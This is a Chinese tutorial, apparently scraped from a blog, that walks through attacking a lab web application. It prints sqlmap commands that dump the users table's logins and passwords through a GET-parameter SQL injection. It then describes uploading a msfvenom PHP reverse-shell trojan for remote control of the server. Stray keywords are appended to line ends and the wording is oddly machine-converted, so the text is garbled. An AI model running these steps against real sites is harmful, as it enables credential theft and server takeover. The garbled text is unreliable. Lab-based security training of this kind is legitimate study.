如何獲取網站用戶名及密碼以及上傳木馬系列教程之一

 

說明:此篇文章(包含演示用的軟件等)僅供學習及交流使用,嚴禁用於其餘用途。php

咱們不少人在登錄網站的時候,都須要輸入用戶名和密碼進行登錄,假入咱們沒有用戶名和密碼時,怎麼登錄呢?通常常見思路有如下幾種:sql

1.普通人都知道的:暴力破解。數據庫

2.利用網站的漏洞(SQL注入等)。服務器

3.利用服務器上的系統漏洞或者軟件漏洞。工具

4.社會工程。學習

 

在這裏,我會對以上幾種常見思路進行演示和說明,固然這一篇講的主要是利用SQL注入 GET型注入漏洞。如下的演示環境我是搭建於虛擬機中,進行演示和測試,稍後我會將測試環境打包放在百度雲上,供有須要的朋友進行下載。測試

 

1.使用OWASP ZAP掃描目標網站,查看是否存在相關漏洞。網站

 

 

 2.查看是由具備SQL GET類型注入點3d

 

 

 

3. 使用工具SQLMAP 進行注入測試blog

(1)爆庫:sqlmap -u "http://192.168.0.212/cat.php?id=3" --dbs

 

 

 (2)爆表:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" --tables

 

 

 (3)爆字段名:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" --columns

 

 

 

 

 

 

 

(4)爆數據庫裏面的用戶名和密碼:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

 

 

 

好了等待一會,發現密碼是使用MD5進行保護的,咱們並不知道密碼,沒事,繼續等待一會,sqlmap會使用默認的字典進行破解,等待一會,破解完成,獲得了咱們想要的用戶名和密碼:

 

 

 而後咱們使用獲得的用戶名和密碼登錄系統。

 

進入登錄頁面,輸入相應的用戶名和密碼,Well,登錄成功。

 

 

 

系統登錄成功以後,咱們查看是否存在上傳漏洞,在網站上查找一會,咱們看到了有上傳圖片的接口,咱們對該接口進行測試,發現具備文件上傳權限,而且文件過濾名,沒有包含.PHP文件,所以,咱們能夠上傳

.PHP的木馬來獲取系統的最高權限。

 

 

 4.使用msfvenom生產反彈型木馬

 

 

 

 

 

 5.監聽本地端口,等待反彈木馬的鏈接

訪問木馬文件,木馬文件,會向咱們的TCP端口發起一個鏈接,從而反向控制服務器。

咱們首打開本地監聽端口,等待木馬的反向鏈接:

這裏使用監聽的是msfconsole工具,啓動msfconsole:

 

 

設置相關參數,而後啓動監聽

 

 好了,已經創建服務器的反向鏈接了,能夠遠程控制計算機了。

相關文章
相關標籤/搜索